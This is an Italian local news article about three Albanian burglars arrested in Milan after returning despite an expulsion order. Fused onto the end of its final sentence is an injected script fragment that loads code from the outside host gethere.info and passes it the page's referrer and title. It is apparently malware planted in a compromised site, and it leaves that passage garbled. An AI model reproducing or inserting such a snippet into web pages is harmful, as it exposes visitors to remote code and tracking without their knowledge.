"/>
domenica 19 novembre 2017 11:19:15
omnimilano

Espulsi da Italia tornano per commettere furti, arrestati tre ‘professionisti’ dello scasso

28 dicembre 2016 Cronaca

Arrestati tre ladri d’appartamento albanesi, ieri attorno alle 16 in via Traiano, dagli agenti del commissariato di Quarto Oggiaro. Si tratta di tre pregiudicati: un 23enne, un 27enne e un 24enne. Erano già stati espulsi dal territorio italiano e accompagnati in patria meno di sei mesi fa, ma, nonostante il divieto di ritorno, sono tornati a Milano. Durante un normale controllo di prevenzione contro le rapine agli esercizi commerciali, appositamente intrapreso durante il periodo festivo, gli agenti hanno sorpreso i tre ladri mentre giravano su una Ford Focus senza documenti. Portati in questura, sono stati identificati ed è emerso che erano in Italia illegalmente, perché rientrati prima dei 5 anni previsti dalla legge. La macchina è risultata intestata ad un prestanome che ne ha altre 130 registrate a suo nome, Antonio B.. I tre albanesi avevano un kit completo per scassinare porte, finestre e saracinesche, compreso di mazza da baseball, coltello e piede di porco. I tre albanesi sono in carcere perché illegali sul suolo italiano e perché trovati in possesso di attrezzi atti allo scasso.
Sempre a Quarto Oggiaro gli scorsi giorni stato chiuso un centro scommesse in via Varesina, segnalato dal commissariato.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Condividi questo articolo